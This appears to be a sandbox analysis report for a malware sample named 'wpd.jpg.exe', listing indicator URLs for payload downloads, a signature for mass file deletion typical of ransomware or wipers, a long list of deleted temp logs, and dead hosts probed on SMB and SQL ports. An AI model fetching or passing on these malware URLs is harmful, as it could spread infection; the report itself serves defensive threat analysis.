url	http://175.208.134.150:8282/test/exe1.zip
url	http://123.123.123.123:54321/dlr.arm
url	https://192.168.3.119/
url	http://139.5.177.32:9999/
url	http://185.47.128.124:8124/m17010.txt
url	http://139.5.177.32:9999

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 100 events)

file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000007.log
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00003.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file	C:\Users\test22\AppData\Local\Temp\MSIc6ae6.LOG
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000008.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000016.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000011.log
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(201804051522349E8).log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000027.log
file	C:\Users\test22\AppData\Local\Temp\java_install_reg.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000015.log
file	C:\Users\test22\AppData\Local\Temp\AdobeARM.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000028.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20210707200853994).log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000001.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000019.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000018.log
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00002.log
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00000.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(2018040515215734C).log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000003.log
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_001_vcRuntimeAdditional_x64.log
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file	C:\Users\test22\AppData\Local\Temp\StructuredQuery.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000013.log
file	C:\Users\test22\AppData\Local\Temp\JavaDeployReg.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20200504233731A78).log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(202107071812439D0).log
file	C:\Users\test22\AppData\Local\Temp\MSIdfbe6.LOG
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000024.log
file	C:\Users\test22\AppData\Local\Temp\MpCmdRun.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000014.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000023.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(2020110220215923AC).log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000005.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000002.log
file	C:\Users\test22\AppData\Local\Temp\jusched.log
file	C:\Users\test22\AppData\Local\Temp\ASPNETSetup_00001.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152043A34).log
file	C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548.log
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(2018040515215734C).log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000026.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000006.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000022.log
file	C:\Users\test22\AppData\Local\Temp\UserInfoSetup(20180405152044A34).log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000012.log
file	C:\Users\test22\AppData\Local\Temp\SetupExe(201804051529428CC).log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000010.log
file	C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000017.log

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (8 events)

dead_host	139.5.177.32:9999
dead_host	192.168.56.1:445
dead_host	192.168.56.103:49232
dead_host	192.168.56.103:49290
dead_host	192.168.56.101:445
dead_host	192.168.56.1:1433
dead_host	192.168.56.101:1433
dead_host	192.168.56.103:49432

Archive wpd.jpg.exe @ sandbox.zip

Summary

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All